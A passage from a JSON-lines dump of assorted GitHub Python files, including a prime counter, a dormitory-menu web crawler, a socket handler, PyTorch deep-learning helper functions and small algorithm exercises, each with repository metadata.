diff_b**2)**0.5\r\n\r\n","repo_name":"kodachrome200/mosaic-generator","sub_path":"mosaic.py","file_name":"mosaic.py","file_ext":"py","file_size_in_byte":4185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"675620988","text":"# count Prime\ndef isPrime(x):\n if x < 2:\n return False\n\n for i in range(2, x):\n if x % i == 0:\n return False\n return True\n\n\ndef countPrimes(n):\n return sum([1 if (isPrime(i) == True) else 0 for i in n])\n\nn_numbers = int(input())\nl_numbers = list(map(int, input().split()))\nprint(countPrimes(l_numbers))","repo_name":"congvm-cs/bigo","sub_path":"lesson_06/countPrime.py","file_name":"countPrime.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41727751338","text":"# this program creates an empty dictionary, \n# then assigns the default value for each new 'character' to 0\n# this loops through the message counting the characters\n\nmessage = 'It was a bright cold day in April, and the clocks were striking thirteen.'\ncount = {}\n\nfor character in message:\n\tcount.setdefault(character, 0)\n\tcount[character] = count[character] + 1\n\nprint(count)\n\n# {' ': 13, ',': 1, '.': 1, 'A': 1, 'I': 1, 'a': 4, 'c': 3, 'b': 1, 'e': 5, 'd': 3, 'g': 2, 'i':\n# 6, 'h': 3, 'k': 2, 'l': 3, 'o': 2, 'n': 4, 'p': 1, 's': 3, 'r': 5, 't': 6, 'w': 2, 'y': 1}\n","repo_name":"cartertrafton/learningPython","sub_path":"chapter5/characterCount.py","file_name":"characterCount.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18567348984","text":"from typing import Dict, Callable\n\nfrom dataforest.structures.cache.HashCash import HashCash\nfrom dataforest.filesystem.io.FileIO import FileIO\n\n\nclass IOCache(HashCash):\n \"\"\"\n Lazy loading for `FileIO`s for a single process.\n\n Key: `file_alias` -- alias for filename (union of keys in `standard_files`\n and `file_map[process_name]` from dataforest.config.default_config.yaml\n\n Val: `FileIO` object for `file_alias`\n \"\"\"\n\n def __init__(\n self,\n file_dict: Dict[str, str],\n method_dict: Dict[str, Callable],\n kwargs_dict: Dict[str, dict],\n path_cache: \"PathCache\",\n ):\n super().__init__()\n self._file_dict = file_dict\n self._method_dict = method_dict\n self._kwargs_dict = kwargs_dict\n self._path_cache = path_cache\n\n def _get(self, file_alias):\n filepath = self._path_cache[file_alias]\n method = self._method_dict[file_alias]\n method_kwargs = self._kwargs_dict[file_alias]\n file_io = FileIO(filepath, method, method_kwargs)\n return file_io\n","repo_name":"TheAustinator/dataforest","sub_path":"dataforest/structures/cache/IOCache.py","file_name":"IOCache.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"41166854142","text":"from core.nlp.response_generator.product.base.base_response_generator import BaseResponseGenerator\nimport logging\nimport numpy as np\n\n\nclass OYSCMPResponseGenerator(BaseResponseGenerator):\n def __call__(self):\n try:\n responses = self.__create_oys_after_cmp()\n\n self.response_data['regular'] = responses\n\n return self.response_data\n except:\n logging.exception('')\n return self.response_data\n\n def __create_oys_after_cmp(self):\n options = [\n [\"Life is tough😞\", \"I am here for you now\"],\n [\"I am sorry for you..😢\", \"Just vent me anything you want\"],\n [\"Life is not always easy right☹️\", \"Let me just be with you\"]\n ]\n np.random.shuffle(options)\n return options[0]\n","repo_name":"rinigo/therapy_chatbot_jullie","sub_path":"core/nlp/response_generator/product/cct/OYS_CMP_response_generator.py","file_name":"OYS_CMP_response_generator.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"70558465688","text":"import pandas as pd\nfrom sqlalchemy import create_engine\nimport requests\nfrom bs4 import BeautifulSoup as bs\nimport schedule\nimport time\nimport re\n\nschedule.every().saturday.at(\"22:00\").do(crawl_chungbuk)\n\ndef crawl_chungbuk():\n for index in range(1,4):\n print(index)\n url = f'https://dorm.chungbuk.ac.kr/home/sub.php?menukey=20041&type={index}'\n raw_html = requests.get(url)\n soup = bs(raw_html.content, 'html.parser')\n\n for i in soup.find_all(\"td\", {\"class\":\"morning\"}):\n for br in soup.find_all(\"br\"):\n br.replace_with(\" \")\n for i in soup.find_all(\"td\", {\"class\":\"lunch\"}):\n for br in soup.find_all(\"br\"):\n br.replace_with(\" \")\n for i in soup.find_all(\"td\", {\"class\":\"evening\"}):\n for br in soup.find_all(\"br\"):\n br.replace_with(\" \")\n\n df = pd.read_html(str(soup))\n df = df[0]\n df = df.astype(\"string\")\n \n pattern = r'\\([^)]*\\)' # 정규표현식 ()삭제\n df[\"아침\"] = df[\"아침\"].str.replace(pat=pattern, repl='', regex=True)\n df[\"점심\"] = df[\"점심\"].str.replace(pat=pattern, repl='', regex=True)\n df[\"저녁\"] = df[\"저녁\"].str.replace(pat=pattern, repl='', regex=True)\n \n \n engine = create_engine('mysql+pymysql://mysql:0963@127.0.0.1:3306/shop')\n conn = engine.connect()\n df[\"요일\"] = df[\"요일\"].str.split(' ').str.get(0)\n df.to_sql(name=f'dorm{index}', con=conn, if_exists='replace', index=False)\n \n \n\ncrawl_chungbuk()","repo_name":"Chaewoong2/-","sub_path":"crawling.py","file_name":"crawling.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19182350323","text":"import os\nimport subprocess\n\ndef execute_python_files(folder_path):\n # Get a list of all files in the folder\n files = os.listdir(folder_path)\n \n # Filter the Python files\n python_files = [file for file in files if file.endswith('.py')]\n \n # Execute each Python file\n for python_file in python_files:\n file_path = os.path.join(folder_path, python_file)\n try:\n subprocess.run(['python3', file_path], check=True)\n except subprocess.CalledProcessError as e:\n print(f\"Error executing {file_path}: {e}\")\n else:\n print(f\"Successfully executed {file_path}\")\n\nif __name__ == \"__main__\":\n folder_path = \"auto/generate\"\n execute_python_files(folder_path)\n","repo_name":"jamelyassin84/broca-studio-website","sub_path":"auto/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35798598600","text":"import time\nimport socket\nfrom rpi_rilla.threadable import Threadable\nfrom rpi_rilla.socket_sender import send_msg\n\nsep = \"_\"\n\nclass SocketHandler(Threadable):\n def __init__(self, action, port=10000, host='127.0.0.1', max_length=4096):\n self.action = action\n self.max_length = max_length\n self.host = host\n self.port = port\n self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.server_socket.bind((host, port))\n self.server_socket.listen(10)\n super().__init__()\n\n def loop(self):\n client_socket, _ = self.server_socket.accept()\n msg = client_socket.recv(self.max_length).decode()\n cmds = msg.split(sep)\n print(cmds)\n\n try:\n f = self.action(*cmds)\n except TypeError:\n f = None\n if f is None:\n print(\"no action implemented for this message\")\n else:\n f()\n\n def self_send(self, msg):\n send_msg(msg, self.host, self.port)\n\n def stop(self):\n super().stop()\n self.self_send(\"_\")\n self.server_socket.close()\n","repo_name":"gthar/rpi_rilla","sub_path":"rpi_rilla/socket_handler.py","file_name":"socket_handler.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8343014156","text":"import zmq\nimport time\n\nport = \"5556\"\ncontext = zmq.Context()\nsocket = context.socket(zmq.PAIR)\nsocket.bind(\"tcp://*:%s\" % port)\ncount = 0\n\nwhile True:\n count = count + 1\n socket.send(\"thing1 to thing2 \" + str(count))\n # try:\n # msg = socket.recv(flags=zmq.DONTWAIT)\n # print (msg)\n # except zmq.Again:\n # pass\n msg = socket.recv()\n print (msg)\n\n time.sleep(1)\n","repo_name":"eiselesr/0MQExamples","sub_path":"sandbox/pair/thing1.py","file_name":"thing1.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18762425100","text":"'''\n문제\n배열을 정렬하는 것은 쉽다. 수가 주어지면, 그 수의 각 자리수를 내림차순으로 정렬해보자.\n\n입력\n첫째 줄에 정렬하려고 하는 수 N이 주어진다. N은 1,000,000,000보다 작거나 같은 자연수이다.\n\n출력\n첫째 줄에 자리수를 내림차순으�� 정렬한 수를 출력한다.\n'''\n\ndef bubbleSort(n) :\n for i in range (len(n)-1, 0, -1) :\n for j in range (0, i) :\n if n[j] < n[j+1] :\n n[j], n[j+1] = n[j+1], n[j]\n\nn = list(map(int, list(input())))\nbubbleSort(n)\nres = ''\nfor i in n :\n res += str(i)\nprint(res)","repo_name":"JaeGeunJang/BaekJoon_Project","sub_path":"Python/단계별/12_정렬/05_1427.py","file_name":"05_1427.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33353784199","text":"from simulation_study.evaluate.base_function import run_simulation\nfrom simulation_study.evaluate.parameters import *\n\n\ncurr_seed = 1993\ndistributions = [stats.chi2(6), stats.chi2(7)]\nn_dim = len(distributions)\nnum_mixtures = 15\nrho = .1\nn_rows = 100\np_mcar = 0.1\nshift = 0\nregression_parameter = 2\ncov = np.array([[1, rho], [rho, 1]])\nmethod = \"shrinkage\"\n\neps = 0.003\nM = np.concatenate((np.array(20 * [50]), np.array(5 * [1000])))\nn_sample = 10000\n\n\nresult = run_simulation(curr_seed,\n num_mixtures=num_mixtures,\n M=M,\n n_sample=n_sample,\n eps=eps,\n method=method,\n cov=cov,\n n_rows=n_rows)\n","repo_name":"mkrtl/misscop","sub_path":"simulation_study/evaluate/entropy.py","file_name":"entropy.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32370863577","text":"N = int( input() )\nS = [ tuple( map( int, input().split() ) ) for _ in range( N ) ]\nT = [ tuple( map( int, input().split() ) ) for _ in range( N ) ]\n\nif N == 1:\n print( \"Yes\" )\n exit()\n\ndef kyori( A, B ):\n a_x, a_y = A\n b_x, b_y = B\n x = a_x - b_x\n y = a_y - b_y\n return x * x + y * y\n\ndef gaiseki( A, B ):\n a_x, a_y = A\n b_x, b_y = B\n return a_x * b_y - a_y * b_x\n\nc = S[ 0 ]\ns_1 = ( S[ 1 ][ 0 ] - c[ 0 ], S[ 1 ][ 1 ] - c[ 1 ] )\ngaisekis_S = [ \n (\n kyori( ( s[ 0 ] - c[ 0 ], s[ 1 ] - c[ 1 ] ), s_1 ),\n gaiseki( ( s[ 0 ] - c[ 0 ], s[ 1 ] - c[ 1 ] ), s_1 ) \n ) for s in S \n]\n\nans = False\n\nimport itertools\n\nfor t_1, t_2 in itertools.permutations( T, 2 ):\n t_2 = ( t_2[ 0 ] - t_1[ 0 ], t_2[ 1 ] - t_1[ 1 ] )\n gaisekis_T = [ \n (\n kyori( ( t[ 0 ] - t_1[ 0 ], t[ 1 ] - t_1[ 1 ] ), t_2 ),\n gaiseki( ( t[ 0 ] - t_1[ 0 ], t[ 1 ] - t_1[ 1 ] ), t_2 ) \n ) for t in T \n ]\n if set( gaisekis_S ) == set( gaisekis_T ):\n # print( t_1, t_2 )\n # print( gaisekis_S )\n # print( gaisekis_T )\n ans = True\n\nif ans:\n print( \"Yes\" )\nelse:\n print( \"No\" )","repo_name":"tsukasa2/AtCoder","sub_path":"practice/ABC/207/abc207-d.py","file_name":"abc207-d.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41338976400","text":"import torch\nimport torchvision\nimport torchvision.transforms as transforms\nimport torch.nn as nn\nimport matplotlib.pyplot as plt\nimport time\nimport sys\nimport random\nimport zipfile\nimport numpy as np\n\n\ndef linreg(X, w, b):\n return torch.mm(X, w) + b\n\ndef squared_loss(y_hat,y):\n return (y_hat - y.view(y_hat.size())) ** 2 / 2 # 这里返回的是向量\n\n# ImageAssistant\ndef load_data_fashion_mnist(batch_size,resize=None):\n\n trans = []\n if resize:\n trans.append((transforms.Resize(size=resize)))\n trans.append(transforms.ToTensor())\n transform = transforms.Compose(trans)\n\n mnist_train = torchvision.datasets.FashionMNIST(\"../../Datasets/FashionMNIST\",train=True,download=True,transform=transform)\n mnist_test = torchvision.datasets.FashionMNIST(\"../../Datasets/FashionMNIST\",train=False,download=True,transform=transform)\n\n train_iter = torch.utils.data.DataLoader(mnist_train,batch_size=batch_size,shuffle=True,num_workers=4)\n test_iter = torch.utils.data.DataLoader(mnist_test,batch_size=batch_size,shuffle=True,num_workers=4)\n\n return train_iter,test_iter\n\ndef get_fashion_mnist_labels(labels):\n text_labels = ['t-shirt','trouser','pullover','dress','coat','sandal','shirt','sneaker','bag','ankel boot']\n\n return [text_labels[int(i)] for i in labels]\n\ndef show_fashion_mnist(images,labels):\n\n _,figs = plt.subplots(1,10,figsize=(12,12))\n for f,img,lbl in zip(figs,images,labels):\n img = img.view((28,28)).numpy()\n f.imshow(img)\n f.set_title(lbl)\n f.axes.get_xaxis().set_visible(False)\n f.axes.get_yaxis().set_visible(False)\n\n plt.show()\n\n\n\ndef evaluate_accuracy(data_iter, net):\n\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n acc_sum, n = 0.0, 0\n for X, y in data_iter:\n if isinstance(net, torch.nn.Module):\n net.eval() # 评估模式,关闭dropout\n acc_sum += (net(X.to(device)).argmax(dim=1) == y.to(device)).float().sum().cpu().item()\n net.train()\n else:\n if ('is_training' in net.__code__.co_varnames): # 有is_training这个参数\n acc_sum += (net(X,is_training=False).argmax(dim=1) ==y).float().sum().item()\n\n n += y.shape[0]\n\n return acc_sum / n\n\n\ndef sgd(params, lr, batch_size):\n for param in params:\n param.data -= lr * param.grad / batch_size\n\n\nclass FlattenLayer(torch.nn.Module):\n def __init__(self):\n super(FlattenLayer, self).__init__()\n\n def forward(self, X):\n return X.view(X.shape[0], -1)\n\n\ndef train_ch3(net, train_iter, test_iter, loss, num_epochs, batch_size, params=None, lr=None, optimizer=None):\n\n print(\"changeing train\")\n for epoch in range(num_epochs):\n train_l_sum,train_acc_sum,n = 0.0,0.0,0\n for X, y in train_iter:\n\n y_hat = net(X)\n l = loss(y_hat,y).sum()\n\n # 梯度清零\n if optimizer is not None:\n optimizer.zero_grad()\n elif params is not None and params[0].grad is not None:\n for param in params:\n param.grad.data.zero_()\n\n l.backward()\n if optimizer is None:\n sgd(params, lr, batch_size)\n else:\n optimizer.step()\n\n train_l_sum += l.item()\n train_acc_sum += (y_hat.argmax(dim=1) == y).sum().item()\n n += y.shape[0]\n test_acc = evaluate_accuracy(test_iter,net)\n\n print(\"epoch %d,loss %.4f,train acc %.3f,test_acc %.3f\" % (epoch +1,train_l_sum / n ,train_acc_sum / n,test_acc))\n\ndef train_ch5(net,train_iter,test_iter,batch_size,optimizer,device,num_epochs):\n net = net.to(device)\n print(\"training on \",device)\n\n loss = torch.nn.CrossEntropyLoss()\n batch_count = 0\n for epoch in range(num_epochs):\n train_l_sum,train_acc_sum,n,start = 0.0,0.0,0,time.time()\n\n for x,y in train_iter:\n x = x.to(device)\n y = y.to(device)\n y_hat = net(x)\n l = loss(y_hat,y)\n optimizer.zero_grad()\n l.backward()\n optimizer.step()\n\n train_l_sum += l.cpu().item()\n train_acc_sum += (y_hat.argmax(dim=1) == y).sum().cpu().item()\n\n n += y.shape[0]\n batch_count += 1\n test_acc = evaluate_accuracy(test_iter,net)\n\n print('epoch %d, loss %.4f, train acc %.3f,test acc %.3f,time %.1f' %(epoch + 1,train_l_sum / batch_count,train_acc_sum / n ,test_acc,time.time()-start))\n\ndef semilogy(x_vals,y_vals,x_label,y_label,x2_vals=None,y2_vals=None,legend=None):\n plt.xlabel(x_label)\n plt.ylabel(y_label)\n plt.semilogy(x_vals,y_vals)\n if x2_vals and y2_vals:\n plt.semilogy(x2_vals,y2_vals,linestyle=':')\n plt.legend(legend)\n\n\ndef corr2d(x, k):\n h, w = k.shape\n\n y = torch.zeros((x.shape[0] - h + 1, x.shape[1] - w + 1))\n for i in range(y.shape[0]):\n for j in range(y.shape[1]):\n y[i, j] = (x[i:i + h, j:j + w] * k).sum()\n\n return y\n\n\nclass GlobalAvgPool2d(nn.Module):\n # 全局平均池化层可以将池化窗口设置为输入的宽和高实现\n def __init__(self):\n super(GlobalAvgPool2d, self).__init__()\n\n def forward(self, x):\n return nn.functional.avg_pool2d(x, kernel_size=x.size()[2:])\n\nclass Residual(nn.Module):\n def __init__(self,in_channels,out_channels,use_1x1conv=False,stride=1):\n super(Residual,self).__init__()\n\n self.conv1 = nn.Conv2d(in_channels,out_channels,kernel_size=3,padding=1,stride=stride)\n self.conv2 = nn.Conv2d(out_channels,out_channels,kernel_size=3,padding=1)\n if use_1x1conv:\n self.conv3 = nn.Conv2d(in_channels,out_channels,kernel_size=1,stride=stride)\n else:\n self.conv3 = None\n\n self.bn1 = nn.BatchNorm2d(out_channels)\n self.bn2 = nn.BatchNorm2d(out_channels)\n\n def forward(self,x):\n y = F.relu(self.bn1(self.conv1(x)))\n y = self.bn2(self.conv2(y))\n\n if self.conv3:\n x = self.conv3(x)\n\n return F.relu(y + x)\n################################################################\n## chapter 6 language model\n################################################################\n\n\n# 周杰伦歌词数据集\ndef load_data_jay_lyrics():\n with zipfile.ZipFile(\"../data/jaychou_lyrics.txt.zip\")as zin:\n with zin.open(\"jaychou_lyrics.txt\") as f:\n corpus_chars = f.read().decode(\"utf-8\")\n\n\n # 这个数据集有6万多个字符,为了打印方便,将换行符换成空格\n corpus_chars = corpus_chars.replace(\"\\n\", \" \").replace(\"\\r\", \" \")\n corpus_chars = corpus_chars[0:20000]\n idx_to_char = list(set(corpus_chars))\n char_to_idx = dict([(char, i) for i, char in enumerate(idx_to_char)])\n vocab_size = len(char_to_idx)\n corpus_indices = [char_to_idx[char] for char in corpus_chars]\n\n return corpus_indices,char_to_idx,idx_to_char,vocab_size\n\n\ndef data_iter_random(corpus_indices,batch_size,num_steps,device=None):\n # -1是因为输出的索引x市相应的输入的索引y+1\n num_examples = (len(corpus_indices) - 1) // num_steps\n epoch_size = num_examples // batch_size\n\n examples_indices = list(range(num_examples))\n random.shuffle(examples_indices)\n\n def _data(pos):\n return corpus_indices[pos:pos + num_steps]\n\n if device is None:\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n for i in range(epoch_size):\n i = i * batch_size\n batch_indices = examples_indices[i: i + batch_size]\n x = [_data(j * num_steps) for j in batch_indices]\n y = [_data(j * num_steps + 1) for j in batch_indices]\n yield torch.tensor(x, dtype=torch.float32, device=device), torch.tensor(y, dtype=torch.float32, device=device)\n\ndef data_iter_consecutive(corpus_indices,batch_size,num_stpes,device=None):\n if device is None:\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n corpus_indices = torch.tensor(corpus_indices,dtype=torch.float32,device=device)\n data_len = len(corpus_indices)\n batch_len = data_len // batch_size\n\n indices = corpus_indices[0:batch_size * batch_len].view(batch_size,batch_len)\n\n epoch_size = (batch_len - 1) // num_stpes\n\n for i in range(epoch_size):\n i = i * num_stpes\n x = indices[:,i : i + num_stpes]\n y = indices[:,i + 1 : i + num_stpes + 1]\n yield x,y\n\n\ndef one_hot(x, n_class, dtype=torch.float32):\n x = x.long()\n res = torch.zeros(x.shape[0], n_class, dtype=dtype, device=x.device)\n res.scatter_(1, x.view(-1, 1), 1)\n return res\n\n\ndef to_onehot(x, n_class):\n # x shape:(batch,seq_len),\n # output: seq_len elements of (batch,n_class)\n\n return [one_hot(x[:, i], n_class) for i in range(x.shape[1])]\n\n\ndef predict_rnn(prefix, num_chars, rnn, params, init_rnn_state, num_hiddens,\n vocab_size, device, idx_to_char, char_to_idx):\n\n state = init_rnn_state(1, num_hiddens, device)\n output = [char_to_idx[prefix[0]]]\n for t in range(num_chars + len(prefix) - 1):\n # 将上一个时间步的输出作为下一个时间步的输入\n x = to_onehot(torch.tensor([[output[-1]]], device=device), vocab_size)\n (y, state) = rnn(x, state, params) #计算和更新隐藏状态\n #下一个时间步的输入是prefix里的字符或者当前的最佳预测字符\n if t < len(prefix) - 1:\n output.append(char_to_idx[prefix[t + 1]])\n else:\n output.append(int(y[0].argmax(dim=1).item()))\n\n return \"\".join([idx_to_char[i] for i in output])\n\ndef grad_clipping(params,theta,device):\n norm = torch.tensor([0.0],device=device)\n for param in params:\n norm += (param.grad.data ** 2).sum()\n norm = norm.sqrt().item()\n if norm > theta:\n for param in params:\n param.grad.data *= (theta / norm)\n\n\ndef train_and_predict_rnn(rnn, get_params, init_rnn_state, num_hiddens,\n vocab_size, device, corpus_indices, idx_to_char,\n char_to_idx, is_random_iter, num_epochs, num_steps,\n lr, clipping_theta, batch_size, pred_period,\n pred_len, prefixes):\n if is_random_iter:\n data_iter_fn = d2l.data_iter_random\n else:\n data_iter_fn = d2l.data_iter_consecutive\n\n params = get_params()\n loss = nn.CrossEntropyLoss()\n\n for epoch in range(num_epochs):\n if not is_random_iter: # 使用相邻采样,在epoch开始时初始化隐藏层\n state = init_rnn_state(batch_size, num_hiddens, device)\n l_sum, n, start = 0.0, 0, time.time()\n data_iter = data_iter_fn(corpus_indices, batch_size, num_steps, device)\n for x, y in data_iter:\n # 随机采样,在每个小批量更新钱初始化隐藏状态\n if is_random_iter:\n state = init_rnn_state(batch_size, num_hiddens, device)\n else:\n for s in state:\n s.detach_()\n inputs = to_onehot(x, vocab_size)\n (outputs, state) = rnn(inputs, state, params)\n outputs = torch.cat(outputs, dim=0)\n y = torch.transpose(x, 0, 1).contiguous().view(-1)\n l = loss(outputs, y.long())\n\n if params[0].grad is not None:\n for param in params:\n param.grad.data.zero_()\n l.backward()\n grad_clipping(params, clipping_theta, device)\n d2l.sgd(params, lr, 1)\n\n l_sum += l.item() * y.shape[0]\n n += y.shape[0]\n\n if (epoch + 1) % pred_period == 0:\n print(\"epoch %d,perplexity %f,time %.2f sec\" %\n (epoch + 1, math.exp(l_sum / n), time.time() - start))\n\n for prefix in prefixes:\n print(\" -\",predict_rnn(prefix, pred_len, rnn, params, init_rnn_state,\n num_hiddens, vocab_size, device, idx_to_char,\n char_to_idx))\n\n\n\n\n\n##################################\n## chapter 7 Gradient Descent\n################################\n\n\ndef get_data_ch7():\n data = np.genfromtxt(\"../data/airfoil_self_noise.data\", delimiter=\"\\t\")\n data = (data - data.mean(axis=0)) / data.std(axis=0)\n return torch.tensor(data[:1500, :-1],\n dtype=torch.float32), torch.tensor(data[:1500, -1],\n dtype=torch.float32)\n\n\ndef train_2d(trainer):\n x1, x2, s1, s2 = -5, -2, 0, 0\n results = [(x1, x2)]\n for i in range(20):\n x1, x2, s1, s2 = trainer(x1, x2, s1, s2)\n results.append((x1, x2))\n\n print(\"epoch %d,x1 %f,x2 %f\" % (i + 1, x1, x2))\n return results\n\n\ndef show_trace_2d(f, results):\n plt.plot(*zip(*results), \"-o\", color=\"#ff7f0e\")\n x1, x2 = np.meshgrid(np.arange(-5.5, 1.0, 0.1), np.arange(-3.0, 1.0, 0.1))\n plt.contour(x1, x2, f(x1, x2), colors=\"#1f77b4\")\n plt.xlabel(\"x1\")\n plt.ylabel(\"x2\")\n\n\ndef train_ch7(optimizer_fn,\n states,\n hyperparams,\n features,\n labels,\n batch_size=10,\n num_epochs=2):\n net, loss = linreg, squared_loss\n\n w = torch.nn.Parameter(torch.tensor(np.random.normal(\n 0, 0.01, size=(features.shape[1], 1)),\n dtype=torch.float32),\n requires_grad=True)\n b = torch.nn.Parameter(torch.zeros(1, dtype=torch.float32),\n requires_grad=True)\n\n def eval_loss():\n return loss(net(features, w, b), labels).mean().item()\n\n ls = [eval_loss()]\n data_iter = torch.utils.data.DataLoader(torch.utils.data.TensorDataset(\n features, labels),\n batch_size,\n shuffle=True)\n\n for _ in range(num_epochs):\n start = time.time()\n for batch_i, (x, y) in enumerate(data_iter):\n l = loss(net(x, w, b), y).mean()\n\n if w.grad is not None:\n w.grad.data.zero_()\n b.grad.data.zero_()\n\n l.backward()\n optimizer_fn([w, b], states, hyperparams)\n if (batch_i + 1) * batch_size % 100 == 0:\n ls.append(eval_loss())\n\n print(\"loss: %f, %f sec per epoch \" % (ls[-1], time.time() - start))\n plt.plot(np.linspace(0, num_epochs, len(ls)), ls)\n plt.xlabel(\"epoch\")\n plt.ylabel(\"loss\")\n\n\ndef train_pytorch_ch7(optimizer_fn,\n optimizer_hyperparams,\n features,\n labels,\n batch_size=10,\n num_epochs=2):\n\n net = nn.Sequential(nn.Linear(features.shape[-1], 1))\n loss = nn.MSELoss()\n\n optimizer = optimizer_fn(net.parameters(), **optimizer_hyperparams)\n\n def eval_loss():\n return loss(net(features).view(-1), labels).item() / 2\n\n ls = [eval_loss()]\n data_iter = torch.utils.data.DataLoader(torch.utils.data.TensorDataset(\n features, labels),\n batch_size,\n shuffle=True)\n\n for _ in range(num_epochs):\n start = time.time()\n\n for batch_i, (x, y) in enumerate(data_iter):\n l = loss(net(x).view(-1), y) / 2\n\n optimizer.zero_grad()\n l.backward()\n optimizer.step()\n if (batch_i + 1) * batch_size % 100 == 0:\n ls.append(eval_loss())\n\n print(\"loss: %f, %f sec per epoch \" % (ls[-1], time.time() - start))\n plt.plot(np.linspace(0, num_epochs, len(ls)), ls)\n plt.xlabel(\"epoch\")\n plt.ylabel(\"loss\")\n","repo_name":"brookicv/DLearning","sub_path":"DiveInfoDL/d2lzh.py","file_name":"d2lzh.py","file_ext":"py","file_size_in_byte":15732,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"9625323787","text":"class Solution(object):\n def maximalSquare(self, matrix):\n \"\"\"\n :type matrix: List[List[str]]\n :rtype: int\n \"\"\"\n m, n = len(matrix), len(matrix[0])\n dp = [[0] * (n + 1) for i in range(m + 1)]\n maxVal = float(\"-inf\")\n for i in range(1, m + 1):\n for j in range(1, n + 1):\n if matrix[i-1][j-1] == '1':\n dp[i][j] = min(dp[i-1][j], dp[i][j-1], dp[i-1][j-1]) + 1\n maxVal = max(maxVal, dp[i][j])\n return maxVal ** 2 if maxVal != float('-inf') else 0\n \n","repo_name":"madhavappaneni/Leetcode-Submissions","sub_path":"my-folder/problems/maximal_square/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29619332361","text":"# coding:iso-8859-9 Türkçe\r\n# p_12601.py: Olaðan, bellemeli dekoratör ve @ direktifli fibonaki fonksiyonu örneði.\r\n\r\ndef fib (n):\r\n if n == 0: return 0\r\n elif n == 1: return 1\r\n else: return fib (n-1) + fib (n-2)\r\n\r\nfrom random import randint\r\n\r\na = randint (0, 30)\r\nprint (\"Olaðan fibonaki fonksiyonuyla\", a, \"adet seri açýlýmý:\")\r\nfor i in range (a): print (fib (i), end=\", \")\r\n#-------------------------------------------------------------------------------------------------------\r\n\r\ndef bellekle (f):\r\n bellek = {}\r\n def yardýmcý (x):\r\n if x not in bellek: bellek[x] = f (x)\r\n return bellek[x]\r\n return yardýmcý\r\n\r\nprint (\"\\n\\nFibonaki serisinde birsonrakini hesaplamak için hep tekrar tekrar 0'dan baþlamak yerine önceki deðerler bellekte saklanabilir. Bu da iþlem süratini çok çok artýrýr. Ayný açýlýmý belleklemeli dekoratör fibonakiyle tekrarlayalým:\")\r\nfor i in range (a): print (bellekle (fib) (i), end=\", \")\r\n#-------------------------------------------------------------------------------------------------------\r\n\r\n@bellekle\r\ndef fib (n):\r\n if n == 0: return 0\r\n elif n == 1: return 1\r\n else: return fib (n-1) + fib (n-2)\r\n\r\nprint (\"\\n\\nÇaðýrmayý 'bellekle (fib) (i)' yerine @ yöntemiyle pratikleþtirelim:\")\r\nfor i in range (a): print (fib (i), end=\", \")\r\n\r\n\r\n\"\"\"Çýktý:\r\n>python p_12601.py\r\nOlaðan fibonaki fonksiyonuyla 18 adet seri açýlýmý:\r\n0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610, 987, 1597,\r\n\r\nFibonaki serisinde birsonrakini hesaplamak için hep tekrar tekrar 0'dan baþlamak\r\n yerine önceki deðerler bellekte saklanabilir. Bu da iþlem süratini çok çok artý\r\nrýr. Ayný açýlýmý belleklemeli dekoratör fibonakiyle tekrarlayalým:\r\n0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610, 987, 1597,\r\n\r\nÇaðýrmayý 'bellekle (fib) (i)' yerine @ yöntemiyle pratikleþtirelim:\r\n0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610, 987, 1597,\r\n\"\"\"","repo_name":"mnihatyavas/Python-uygulamalar","sub_path":"Bernd Klein (520) ile Python/p_12601.py","file_name":"p_12601.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41249369913","text":"#\n# 1604. Alert Using Same Key-Card Three or More Times in a One Hour Period\n#\n# Q: https://leetcode.com/problems/alert-using-same-key-card-three-or-more-times-in-a-one-hour-period/\n# A: https://leetcode.com/problems/alert-using-same-key-card-three-or-more-times-in-a-one-hour-period/discuss/876799/Javascript-Python3-C%2B%2B-Map-%2B-Queue\n#\n\nfrom typing import List\nfrom collections import deque\n\nclass Solution:\n def alertNames(self, names: List[str], times: List[str]) -> List[str]:\n m = {}\n alerts = []\n minutes = lambda time: 